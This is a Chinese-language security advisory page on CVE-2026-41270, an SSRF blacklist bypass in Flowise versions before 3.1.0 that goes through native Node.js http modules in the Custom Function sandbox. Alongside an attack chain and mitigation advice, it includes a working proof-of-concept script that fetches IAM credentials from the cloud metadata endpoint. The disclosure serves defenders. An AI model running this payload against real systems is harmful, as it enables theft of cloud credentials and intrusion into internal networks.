IPBUF安全漏洞报告
English
CVE-2026-41270 CVSS 7.1 高危

CVE-2026-41270 Flowise SSRF防护绕过漏洞

披露日期: 2026-04-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41270
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Flowise

相关标签

SSRFFlowiseSSRF BypassNodeVMCVE-2026-41270

漏洞概述

Flowise在3.1.0之前的版本中存在SSRF防护绕过漏洞。尽管应用通过黑名单限制了axios和node-fetch库的请求,但在Custom Function功能的NodeVM沙箱中,Node.js原生的http、https和net模块未被限制。这导致经过身份验证的攻击者可利用这些原生模块绕过SSRF防御,探测或访问内网资源。

技术细节

该漏洞的核心在于Flowise的NodeVM沙箱配置存在差异。Flowise旨在通过拖拽方式构建LLM流程,其中Custom Function节点允许用户编写JavaScript代码。为了安全起见,开发者针对常用的axios和node-fetch库实施了HTTP_DENY_LIST机制,旨在阻止对本地回环地址、链路本地地址及云元数据服务IP的SSRF攻击。然而,沙箱并未隔离Node.js运行时的原生模块(如http、https、net)。由于这些原生模块不具备应用层的拦截逻辑,攻击者只需在Custom Function中通过require('http')直接调用底层网络能力,即可完全绕过基于黑名单的防御。这种绕过使得低权限认证用户能够探测内网端口、读取云实例元数据(如IAM凭证),进而接管云资源或攻击内部系统。

攻击链分析

STEP 1
1. 获取访问权限
攻击者需要拥有Flowise平台的低权限用户账号。
STEP 2
2. 构造恶意代码
攻击者在Flowise工作流中添加或编辑“Custom Function”节点,编写利用Node.js原生http/https模块请求内网地址(如169.254.169.254)的代码。
STEP 3
3. 执行攻击
运行该工作流,触发Custom Function中的代码执行。
STEP 4
4. 绕过防护
代码直接调用底层网络接口,绕过了针对axios/node-fetch的黑名单检查。
STEP 5
5. 获取敏感信息
服务器向内网发起请求,将元数据或其他敏感信息返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC Code for CVE-2026-41270 // Usage: Paste this code into the 'Custom Function' node in Flowise. // This bypasses the SSRF blacklist by using the native 'http' module. const http = require('http'); // Target: AWS Metadata Service (or any internal IP) const target = '169.254.169.254'; const port = 80; const path = '/latest/meta-data/iam/security-credentials/'; const options = { hostname: target, port: port, path: path, method: 'GET', headers: { 'User-Agent': 'curl/7.68.0' } }; const req = http.request(options, (res) => { let data = ''; res.on('data', (chunk) => { data += chunk; }); res.on('end', () => { console.log('SSRF Response:'); console.log(data); return data; }); }); req.on('error', (e) => { console.error(`Problem with request: ${e.message}`); }); req.end();

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施
如果无法立即升级,建议在网络防火墙或安全组层面阻断Flowise服务器对云元数据服务IP(如169.254.169.254)及关键内网网段的访问。同时,严格限制Flowise平台的用户访问权限,仅允许受信任的开发人员使用Custom Function功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表